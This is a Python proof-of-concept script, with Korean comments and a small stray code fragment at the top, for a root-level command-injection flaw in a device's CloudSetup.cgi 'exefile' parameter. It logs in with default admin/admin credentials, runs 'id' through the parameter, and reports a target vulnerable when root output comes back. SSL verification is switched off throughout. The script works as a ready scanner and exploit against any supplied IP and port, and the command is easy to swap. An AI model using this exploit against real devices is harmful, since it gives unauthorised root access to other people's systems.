import requests
from requests.auth import HTTPDigestAuth
s = requests.Session()
s.auth=HTTPDigestAuth('admin',before_pass)
resp=s.get(url)
# -*- coding: cp949 -*-
# CVE : NCVE-2016-0045
# Description :
# cgi-bin/supervisor/CloudSetup.cgi의 exefile 파라미터에서 관리자 권한으로 명령 실행이 가능한 Remote Code Execute가 발생하는 취약점
'''
----REQUEST----
GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=id HTTP/1.1
----RESPONSE----
HTTP/1.0 200 OK
uid=0(root) gid=0(root) groups=0(root)
'''
import requests
import sys
from requests.auth import HTTPDigestAuth
####ssl-warnings InsecureRequestWarning EXCEPT CASE 1
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
#proxies={'http':'http://localhost:8080', 'https':'https://localhost:8080'}
# Packet Request
def packet(target, port):
try:
s = requests.Session()
s.auth=HTTPDigestAuth('admin','admin')
url="http://"+target+":"+port+"/cgi-bin/supervisor/CloudSetup.cgi?exefile=id"
resp=s.get(url, timeout=3, verify=False)
if resp.status_code == 200 and 'uid=0(root)' in resp.text:
print url+", Vulnerable to NCVE-2016-0045"
else:
print url+", Not Vulnerable to NCVE-2016-0045"
except:
print url+", Not Vulnerable to NCVE-2016-0045"
pass
# MAIN
if __name__ == "__main__":
if sys.argv[1] == "-usage" :
print "[IP] [PORT]"
elif len(sys.argv) is 3 :
packet(sys.argv[1], sys.argv[2])
sys.exit(1)
else:
sys.exit(1)
